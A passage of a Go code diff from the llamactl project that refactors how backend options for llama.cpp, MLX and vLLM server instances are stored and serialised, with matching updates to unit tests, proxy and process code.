if backend_options_map["model"] != "/path/to/model.gguf" {
|
||||
t.Errorf("Expected model '/path/to/model.gguf', got %v", backend_options_map["model"])
|
||||
}
|
||||
if backend_options_map["port"] != float64(8080) {
|
||||
t.Errorf("Expected port 8080, got %v", backend_options_map["port"])
|
||||
}
|
||||
}
|
||||
|
||||
func TestUnmarshalJSON(t *testing.T) {
|
||||
@@ -415,14 +291,14 @@ func TestUnmarshalJSON(t *testing.T) {
|
||||
if opts == nil {
|
||||
t.Fatal("Expected options to be set")
|
||||
}
|
||||
if opts.BackendType != backends.BackendTypeLlamaCpp {
|
||||
t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendType)
|
||||
if opts.BackendOptions.BackendType != backends.BackendTypeLlamaCpp {
|
||||
t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendOptions.BackendType)
|
||||
}
|
||||
if opts.LlamaServerOptions == nil {
|
||||
if opts.BackendOptions.LlamaServerOptions == nil {
|
||||
t.Fatal("Expected LlamaServerOptions to be set")
|
||||
}
|
||||
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
|
||||
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
|
||||
if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/model.gguf" {
|
||||
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
|
||||
}
|
||||
if inst.GetPort() != 8080 {
|
||||
t.Errorf("Expected port 8080, got %d", inst.GetPort())
|
||||
@@ -490,9 +366,11 @@ func TestCreateOptionsValidation(t *testing.T) {
|
||||
options := &instance.Options{
|
||||
MaxRestarts: tt.maxRestarts,
|
||||
RestartDelay: tt.restartDelay,
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -523,9 +401,11 @@ func TestStatusChangeCallback(t *testing.T) {
|
||||
}
|
||||
globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"}
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -588,10 +468,12 @@ func TestSetOptions_NodesPreserved(t *testing.T) {
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
Nodes: tt.initialNodes,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Nodes: tt.initialNodes,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -599,10 +481,12 @@ func TestSetOptions_NodesPreserved(t *testing.T) {
|
||||
|
||||
// Attempt to update nodes (should be ignored)
|
||||
updateOptions := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
Nodes: tt.updateNodes,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
Nodes: tt.updateNodes,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
inst.SetOptions(updateOptions)
|
||||
@@ -620,8 +504,8 @@ func TestSetOptions_NodesPreserved(t *testing.T) {
|
||||
}
|
||||
|
||||
// Verify other options were updated
|
||||
if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected model to be updated to '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
|
||||
if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected model to be updated to '/path/to/new-model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
|
||||
}
|
||||
})
|
||||
}
|
||||
@@ -633,9 +517,11 @@ func TestProcessErrorCases(t *testing.T) {
|
||||
}
|
||||
globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"}
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -663,10 +549,12 @@ func TestRemoteInstanceOperations(t *testing.T) {
|
||||
}
|
||||
globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"}
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
Nodes: map[string]struct{}{"remote-node": {}}, // Remote instance
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Nodes: map[string]struct{}{"remote-node": {}}, // Remote instance
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -702,49 +590,6 @@ func TestRemoteInstanceOperations(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestProxyClearOnOptionsChange(t *testing.T) {
|
||||
backendConfig := &config.BackendConfig{
|
||||
LlamaCpp: config.BackendSettings{Command: "llama-server"},
|
||||
}
|
||||
globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"}
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Host: "localhost",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
inst := instance.New("test", backendConfig, globalSettings, options, "main", nil)
|
||||
|
||||
// Get initial proxy
|
||||
proxy1, err := inst.GetProxy()
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to get initial proxy: %v", err)
|
||||
}
|
||||
|
||||
// Update options (should clear proxy)
|
||||
newOptions := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Host: "localhost",
|
||||
Port: 8081, // Different port
|
||||
},
|
||||
}
|
||||
inst.SetOptions(newOptions)
|
||||
|
||||
// Get proxy again - should be recreated with new port
|
||||
proxy2, err := inst.GetProxy()
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to get proxy after options change: %v", err)
|
||||
}
|
||||
|
||||
// Proxies should be different instances (recreated)
|
||||
if proxy1 == proxy2 {
|
||||
t.Error("Expected proxy to be recreated after options change")
|
||||
}
|
||||
}
|
||||
|
||||
func TestIdleTimeout(t *testing.T) {
|
||||
backendConfig := &config.BackendConfig{
|
||||
LlamaCpp: config.BackendSettings{Command: "llama-server"},
|
||||
@@ -754,10 +599,12 @@ func TestIdleTimeout(t *testing.T) {
|
||||
t.Run("not running never times out", func(t *testing.T) {
|
||||
timeout := 1
|
||||
inst := instance.New("test", backendConfig, globalSettings, &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
IdleTimeout: &timeout,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}, "main", nil)
|
||||
|
||||
@@ -768,10 +615,12 @@ func TestIdleTimeout(t *testing.T) {
|
||||
|
||||
t.Run("no timeout configured", func(t *testing.T) {
|
||||
inst := instance.New("test", backendConfig, globalSettings, &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
IdleTimeout: nil, // No timeout
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}, "main", nil)
|
||||
inst.SetStatus(instance.Running)
|
||||
@@ -784,10 +633,12 @@ func TestIdleTimeout(t *testing.T) {
|
||||
t.Run("timeout exceeded", func(t *testing.T) {
|
||||
timeout := 1 // 1 minute
|
||||
inst := instance.New("test", backendConfig, globalSettings, &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
IdleTimeout: &timeout,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}, "main", nil)
|
||||
inst.SetStatus(instance.Running)
|
||||
|
||||
@@ -4,12 +4,8 @@ import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"llamactl/pkg/backends/mlx"
|
||||
"llamactl/pkg/backends/vllm"
|
||||
"llamactl/pkg/config"
|
||||
"log"
|
||||
"maps"
|
||||
"slices"
|
||||
"sync"
|
||||
)
|
||||
@@ -24,18 +20,12 @@ type Options struct {
|
||||
OnDemandStart *bool `json:"on_demand_start,omitempty"`
|
||||
// Idle timeout
|
||||
IdleTimeout *int `json:"idle_timeout,omitempty"` // minutes
|
||||
//Environment variables
|
||||
// Environment variables
|
||||
Environment map[string]string `json:"environment,omitempty"`
|
||||
|
||||
BackendType backends.BackendType `json:"backend_type"`
|
||||
BackendOptions map[string]any `json:"backend_options,omitempty"`
|
||||
|
||||
// Assigned nodes
|
||||
Nodes map[string]struct{} `json:"-"`
|
||||
|
||||
// Backend-specific options
|
||||
LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"`
|
||||
MlxServerOptions *mlx.MlxServerOptions `json:"-"`
|
||||
VllmServerOptions *vllm.VllmServerOptions `json:"-"`
|
||||
// Backend options
|
||||
BackendOptions backends.Options `json:"-"`
|
||||
}
|
||||
|
||||
// options wraps Options with thread-safe access (unexported).
|
||||
@@ -65,6 +55,18 @@ func (o *options) set(opts *Options) {
|
||||
o.opts = opts
|
||||
}
|
||||
|
||||
func (o *options) GetHost() string {
|
||||
o.mu.RLock()
|
||||
defer o.mu.RUnlock()
|
||||
return o.opts.BackendOptions.GetHost()
|
||||
}
|
||||
|
||||
func (o *options) GetPort() int {
|
||||
o.mu.RLock()
|
||||
defer o.mu.RUnlock()
|
||||
return o.opts.BackendOptions.GetPort()
|
||||
}
|
||||
|
||||
// MarshalJSON implements json.Marshaler for options wrapper
|
||||
func (o *options) MarshalJSON() ([]byte, error) {
|
||||
o.mu.RLock()
|
||||
@@ -88,7 +90,9 @@ func (c *Options) UnmarshalJSON(data []byte) error {
|
||||
// Use anonymous struct to avoid recursion
|
||||
type Alias Options
|
||||
aux := &struct {
|
||||
Nodes []string `json:"nodes,omitempty"` // Accept JSON array
|
||||
Nodes []string `json:"nodes,omitempty"`
|
||||
BackendType backends.BackendType `json:"backend_type"`
|
||||
BackendOptions map[string]any `json:"backend_options,omitempty"`
|
||||
*Alias
|
||||
}{
|
||||
Alias: (*Alias)(c),
|
||||
@@ -106,47 +110,27 @@ func (c *Options) UnmarshalJSON(data []byte) error {
|
||||
}
|
||||
}
|
||||
|
||||
// Parse backend-specific options
|
||||
switch c.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
if c.BackendOptions != nil {
|
||||
// Convert map to JSON and then unmarshal to LlamaServerOptions
|
||||
optionsData, err := json.Marshal(c.BackendOptions)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to marshal backend options: %w", err)
|
||||
}
|
||||
// Create backend options struct and unmarshal
|
||||
c.BackendOptions = backends.Options{
|
||||
BackendType: aux.BackendType,
|
||||
BackendOptions: aux.BackendOptions,
|
||||
}
|
||||
|
||||
c.LlamaServerOptions = &llamacpp.LlamaServerOptions{}
|
||||
if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil {
|
||||
return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
|
||||
}
|
||||
}
|
||||
case backends.BackendTypeMlxLm:
|
||||
if c.BackendOptions != nil {
|
||||
optionsData, err := json.Marshal(c.BackendOptions)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to marshal backend options: %w", err)
|
||||
}
|
||||
// Marshal the backend options to JSON for proper unmarshaling
|
||||
backendJson, err := json.Marshal(struct {
|
||||
BackendType backends.BackendType `json:"backend_type"`
|
||||
BackendOptions map[string]any `json:"backend_options,omitempty"`
|
||||
}{
|
||||
BackendType: aux.BackendType,
|
||||
BackendOptions: aux.BackendOptions,
|
||||
})
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to marshal backend options: %w", err)
|
||||
}
|
||||
|
||||
c.MlxServerOptions = &mlx.MlxServerOptions{}
|
||||
if err := json.Unmarshal(optionsData, c.MlxServerOptions); err != nil {
|
||||
return fmt.Errorf("failed to unmarshal MLX options: %w", err)
|
||||
}
|
||||
}
|
||||
case backends.BackendTypeVllm:
|
||||
if c.BackendOptions != nil {
|
||||
optionsData, err := json.Marshal(c.BackendOptions)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to marshal backend options: %w", err)
|
||||
}
|
||||
|
||||
c.VllmServerOptions = &vllm.VllmServerOptions{}
|
||||
if err := json.Unmarshal(optionsData, c.VllmServerOptions); err != nil {
|
||||
return fmt.Errorf("failed to unmarshal vLLM options: %w", err)
|
||||
}
|
||||
}
|
||||
default:
|
||||
return fmt.Errorf("unknown backend type: %s", c.BackendType)
|
||||
// Unmarshal into the backends.Options struct to trigger its custom unmarshaling
|
||||
if err := json.Unmarshal(backendJson, &c.BackendOptions); err != nil {
|
||||
return fmt.Errorf("failed to unmarshal backend options: %w", err)
|
||||
}
|
||||
|
||||
return nil
|
||||
@@ -157,7 +141,9 @@ func (c *Options) MarshalJSON() ([]byte, error) {
|
||||
// Use anonymous struct to avoid recursion
|
||||
type Alias Options
|
||||
aux := struct {
|
||||
Nodes []string `json:"nodes,omitempty"` // Output as JSON array
|
||||
Nodes []string `json:"nodes,omitempty"` // Output as JSON array
|
||||
BackendType backends.BackendType `json:"backend_type"`
|
||||
BackendOptions map[string]any `json:"backend_options,omitempty"`
|
||||
*Alias
|
||||
}{
|
||||
Alias: (*Alias)(c),
|
||||
@@ -173,52 +159,26 @@ func (c *Options) MarshalJSON() ([]byte, error) {
|
||||
slices.Sort(aux.Nodes)
|
||||
}
|
||||
|
||||
// Convert backend-specific options back to BackendOptions map for JSON
|
||||
switch c.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
if c.LlamaServerOptions != nil {
|
||||
data, err := json.Marshal(c.LlamaServerOptions)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to marshal llama server options: %w", err)
|
||||
}
|
||||
// Set backend type
|
||||
aux.BackendType = c.BackendOptions.BackendType
|
||||
|
||||
var backendOpts map[string]any
|
||||
if err := json.Unmarshal(data, &backendOpts); err != nil {
|
||||
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
|
||||
}
|
||||
|
||||
aux.BackendOptions = backendOpts
|
||||
}
|
||||
case backends.BackendTypeMlxLm:
|
||||
if c.MlxServerOptions != nil {
|
||||
data, err := json.Marshal(c.MlxServerOptions)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to marshal MLX server options: %w", err)
|
||||
}
|
||||
|
||||
var backendOpts map[string]any
|
||||
if err := json.Unmarshal(data, &backendOpts); err != nil {
|
||||
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
|
||||
}
|
||||
|
||||
aux.BackendOptions = backendOpts
|
||||
}
|
||||
case backends.BackendTypeVllm:
|
||||
if c.VllmServerOptions != nil {
|
||||
data, err := json.Marshal(c.VllmServerOptions)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to marshal vLLM server options: %w", err)
|
||||
}
|
||||
|
||||
var backendOpts map[string]any
|
||||
if err := json.Unmarshal(data, &backendOpts); err != nil {
|
||||
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
|
||||
}
|
||||
|
||||
aux.BackendOptions = backendOpts
|
||||
}
|
||||
// Marshal the backends.Options struct to get the properly formatted backend options
|
||||
// Marshal a pointer to trigger the pointer receiver MarshalJSON method
|
||||
backendData, err := json.Marshal(&c.BackendOptions)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to marshal backend options: %w", err)
|
||||
}
|
||||
|
||||
// Unmarshal into a temporary struct to extract the backend_options map
|
||||
var tempBackend struct {
|
||||
BackendOptions map[string]any `json:"backend_options,omitempty"`
|
||||
}
|
||||
if err := json.Unmarshal(backendData, &tempBackend); err != nil {
|
||||
return nil, fmt.Errorf("failed to unmarshal backend data: %w", err)
|
||||
}
|
||||
|
||||
aux.BackendOptions = tempBackend.BackendOptions
|
||||
|
||||
return json.Marshal(aux)
|
||||
}
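
The wire format these two methods round-trip looks roughly like the following. Key names are taken from the struct tags in this diff; the literal string value of backends.BackendTypeLlamaCpp is assumed:

package main

import (
	"encoding/json"
	"fmt"
	"log"

	"llamactl/pkg/instance"
)

func main() {
	payload := []byte(`{
	  "idle_timeout": 10,
	  "backend_type": "llama_cpp",
	  "backend_options": {"model": "/path/to/model.gguf", "port": 8080}
	}`)

	var opts instance.Options
	if err := json.Unmarshal(payload, &opts); err != nil {
		log.Fatal(err)
	}

	// The custom UnmarshalJSON above routes backend_options into the typed
	// backends.Options, so downstream code reads opts.BackendOptions directly.
	fmt.Println(opts.BackendOptions.BackendType)             // llama_cpp (assumed constant value)
	fmt.Println(opts.BackendOptions.LlamaServerOptions.Port) // 8080
}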
|
||||
|
||||
@@ -260,78 +220,3 @@ func (c *Options) validateAndApplyDefaults(name string, globalSettings *config.I
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// getCommand builds the command to run the backend
|
||||
func (c *Options) getCommand(backendConfig *config.BackendSettings) string {
|
||||
|
||||
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
|
||||
return "docker"
|
||||
}
|
||||
|
||||
return backendConfig.Command
|
||||
}
|
||||
|
||||
// buildCommandArgs builds command line arguments for the backend
|
||||
func (c *Options) buildCommandArgs(backendConfig *config.BackendSettings) []string {
|
||||
|
||||
var args []string
|
||||
|
||||
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
|
||||
// For Docker, start with Docker args
|
||||
args = append(args, backendConfig.Docker.Args...)
|
||||
args = append(args, backendConfig.Docker.Image)
|
||||
|
||||
switch c.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
if c.LlamaServerOptions != nil {
|
||||
args = append(args, c.LlamaServerOptions.BuildDockerArgs()...)
|
||||
}
|
||||
case backends.BackendTypeVllm:
|
||||
if c.VllmServerOptions != nil {
|
||||
args = append(args, c.VllmServerOptions.BuildDockerArgs()...)
|
||||
}
|
||||
}
|
||||
|
||||
} else {
|
||||
// For native execution, start with backend args
|
||||
args = append(args, backendConfig.Args...)
|
||||
|
||||
switch c.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
if c.LlamaServerOptions != nil {
|
||||
args = append(args, c.LlamaServerOptions.BuildCommandArgs()...)
|
||||
}
|
||||
case backends.BackendTypeMlxLm:
|
||||
if c.MlxServerOptions != nil {
|
||||
args = append(args, c.MlxServerOptions.BuildCommandArgs()...)
|
||||
}
|
||||
case backends.BackendTypeVllm:
|
||||
if c.VllmServerOptions != nil {
|
||||
args = append(args, c.VllmServerOptions.BuildCommandArgs()...)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return args
|
||||
}
|
||||
|
||||
// buildEnvironment builds the environment variables for the backend process
|
||||
func (c *Options) buildEnvironment(backendConfig *config.BackendSettings) map[string]string {
|
||||
env := map[string]string{}
|
||||
|
||||
if backendConfig.Environment != nil {
|
||||
maps.Copy(env, backendConfig.Environment)
|
||||
}
|
||||
|
||||
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
|
||||
if backendConfig.Docker.Environment != nil {
|
||||
maps.Copy(env, backendConfig.Docker.Environment)
|
||||
}
|
||||
}
|
||||
|
||||
if c.Environment != nil {
|
||||
maps.Copy(env, c.Environment)
|
||||
}
|
||||
|
||||
return env
|
||||
}
|
||||
|
||||
@@ -12,9 +12,6 @@ import (
|
||||
"sync"
|
||||
"syscall"
|
||||
"time"
|
||||
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/config"
|
||||
)
|
||||
|
||||
// process manages the OS process lifecycle for a local instance.
|
||||
@@ -216,7 +213,8 @@ func (p *process) waitForHealthy(timeout int) error {
|
||||
defer cancel()
|
||||
|
||||
// Get host/port from instance
|
||||
host, port := p.instance.getBackendHostPort()
|
||||
host := p.instance.options.GetHost()
|
||||
port := p.instance.options.GetPort()
|
||||
healthURL := fmt.Sprintf("http://%s:%d/health", host, port)
|
||||
|
||||
// Create a dedicated HTTP client for health checks
|
||||
@@ -386,26 +384,15 @@ func (p *process) handleAutoRestart(err error) {
|
||||
|
||||
// buildCommand builds the command to execute using backend-specific logic
|
||||
func (p *process) buildCommand() (*exec.Cmd, error) {
|
||||
// Get options
|
||||
opts := p.instance.GetOptions()
|
||||
if opts == nil {
|
||||
return nil, fmt.Errorf("instance options are nil")
|
||||
}
|
||||
|
||||
// Get backend configuration
|
||||
backendConfig, err := p.getBackendConfig()
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
// Build the environment variables
|
||||
env := opts.buildEnvironment(backendConfig)
|
||||
env := p.instance.buildEnvironment()
|
||||
|
||||
// Get the command to execute
|
||||
command := opts.getCommand(backendConfig)
|
||||
command := p.instance.getCommand()
|
||||
|
||||
// Build command arguments
|
||||
args := opts.buildCommandArgs(backendConfig)
|
||||
args := p.instance.buildCommandArgs()
|
||||
|
||||
// Create the exec.Cmd
|
||||
cmd := exec.CommandContext(p.ctx, command, args...)
|
||||
@@ -420,27 +407,3 @@ func (p *process) buildCommand() (*exec.Cmd, error) {
|
||||
|
||||
return cmd, nil
|
||||
}
|
||||
|
||||
// getBackendConfig resolves the backend configuration for the current instance
|
||||
func (p *process) getBackendConfig() (*config.BackendSettings, error) {
|
||||
opts := p.instance.GetOptions()
|
||||
if opts == nil {
|
||||
return nil, fmt.Errorf("instance options are nil")
|
||||
}
|
||||
|
||||
var backendTypeStr string
|
||||
|
||||
switch opts.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
backendTypeStr = "llama-cpp"
|
||||
case backends.BackendTypeMlxLm:
|
||||
backendTypeStr = "mlx"
|
||||
case backends.BackendTypeVllm:
|
||||
backendTypeStr = "vllm"
|
||||
default:
|
||||
return nil, fmt.Errorf("unsupported backend type: %s", opts.BackendType)
|
||||
}
|
||||
|
||||
settings := p.instance.globalBackendSettings.GetBackendSettings(backendTypeStr)
|
||||
return &settings, nil
|
||||
}
|
||||
|
||||
@@ -2,7 +2,6 @@ package instance
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"llamactl/pkg/backends"
|
||||
"net/http"
|
||||
"net/http/httputil"
|
||||
"net/url"
|
||||
@@ -63,13 +62,16 @@ func (p *proxy) build() (*httputil.ReverseProxy, error) {
|
||||
}
|
||||
|
||||
// Remote instances should not use local proxy - they are handled by RemoteInstanceProxy
|
||||
if len(options.Nodes) > 0 {
|
||||
if _, isLocal := options.Nodes[p.instance.localNodeName]; !isLocal {
|
||||
return nil, fmt.Errorf("instance %s is a remote instance and should not use local proxy", p.instance.Name)
|
||||
}
|
||||
|
||||
// Get host/port from process
|
||||
host, port := p.instance.getBackendHostPort()
|
||||
|
||||
host := p.instance.options.GetHost()
|
||||
port := p.instance.options.GetPort()
|
||||
if port == 0 {
|
||||
return nil, fmt.Errorf("instance %s has no port assigned", p.instance.Name)
|
||||
}
|
||||
targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", host, port))
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", p.instance.Name, err)
|
||||
@@ -78,15 +80,7 @@ func (p *proxy) build() (*httputil.ReverseProxy, error) {
|
||||
proxy := httputil.NewSingleHostReverseProxy(targetURL)
|
||||
|
||||
// Get response headers from backend config
|
||||
var responseHeaders map[string]string
|
||||
switch options.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
responseHeaders = p.instance.globalBackendSettings.LlamaCpp.ResponseHeaders
|
||||
case backends.BackendTypeVllm:
|
||||
responseHeaders = p.instance.globalBackendSettings.VLLM.ResponseHeaders
|
||||
case backends.BackendTypeMlxLm:
|
||||
responseHeaders = p.instance.globalBackendSettings.MLX.ResponseHeaders
|
||||
}
|
||||
responseHeaders := options.BackendOptions.GetResponseHeaders(p.instance.globalBackendSettings)
|
||||
|
||||
proxy.ModifyResponse = func(resp *http.Response) error {
|
||||
// Remove CORS headers from backend response to avoid conflicts
|
||||
|
||||
@@ -3,7 +3,6 @@ package manager_test
|
||||
import (
|
||||
"fmt"
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"llamactl/pkg/config"
|
||||
"llamactl/pkg/instance"
|
||||
"llamactl/pkg/manager"
|
||||
@@ -71,10 +70,12 @@ func TestPersistence(t *testing.T) {
|
||||
// Test instance persistence on creation
|
||||
manager1 := manager.NewInstanceManager(backendConfig, cfg, map[string]config.NodeConfig{}, "main")
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -133,9 +134,11 @@ func TestConcurrentAccess(t *testing.T) {
|
||||
go func(index int) {
|
||||
defer wg.Done()
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
instanceName := fmt.Sprintf("concurrent-test-%d", index)
|
||||
@@ -170,9 +173,11 @@ func TestShutdown(t *testing.T) {
|
||||
|
||||
// Create test instance
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
_, err := mgr.CreateInstance("test-instance", options)
|
||||
@@ -231,11 +236,13 @@ func TestAutoRestartDisabledInstanceStatus(t *testing.T) {
|
||||
|
||||
autoRestart := false
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
AutoRestart: &autoRestart,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
|
||||
@@ -2,7 +2,6 @@ package manager
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/instance"
|
||||
"llamactl/pkg/validation"
|
||||
"os"
|
||||
@@ -86,7 +85,7 @@ func (im *instanceManager) CreateInstance(name string, options *instance.Options
|
||||
return nil, err
|
||||
}
|
||||
|
||||
err = validation.ValidateInstanceOptions(options)
|
||||
err = options.BackendOptions.ValidateInstanceOptions()
|
||||
if err != nil {
|
||||
